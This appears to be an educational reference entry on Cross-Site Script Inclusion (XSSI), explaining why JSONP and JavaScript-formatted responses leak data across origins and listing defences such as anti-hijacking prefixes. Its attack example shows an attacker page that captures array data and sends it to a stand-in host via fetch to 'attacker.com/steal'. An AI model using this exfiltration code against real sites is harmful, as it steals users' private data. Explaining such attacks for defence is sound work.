Cross-Site Script Inclusion (XSSI)

Cross-Site Script Inclusion (XSSI) is a vulnerability where sensitive data returned by a web application in JavaScript format can be stolen by an attacker's site through script inclusion, bypassing Same-Origin Policy restrictions.

How It Works

While SOP prevents reading responses from cross-origin requests, it allows including cross-origin scripts. If sensitive data is returned in executable JavaScript format (like JSONP or JavaScript variable assignments), attackers can include the script and access the data through the execution context.

Vulnerable Response Types

// Dynamic JavaScript with user data
var userData = {"email": "user@example.com", "balance": 1000};

// JSONP response
callback({"email": "user@example.com", "balance": 1000});

// JavaScript array
[{"id": 1, "secret": "abc"}, {"id": 2, "secret": "def"}]

Attack Example

<!-- Attacker's malicious page -->
<script>
// Override Array constructor to capture array literals
var stolenData;
var oldArray = Array;
Array = function() {
  stolenData = arguments;
  return oldArray.apply(this, arguments);
};
</script>

<!-- Include victim's authenticated endpoint -->
<script src="https://victim.com/api/user/data.js"></script>

<script>
// stolenData now contains user's data
fetch('https://attacker.com/steal?data=' + JSON.stringify(stolenData));
</script>

Prevention

• Use standard JSON with proper CORS headers
• Prepend responses with )]}'\n to break direct script execution
• Require non-GET requests for sensitive data
• Include anti-CSRF tokens in requests

See Also

• JSONP
• Same-Origin Policy
• Cross-Site Request Forgery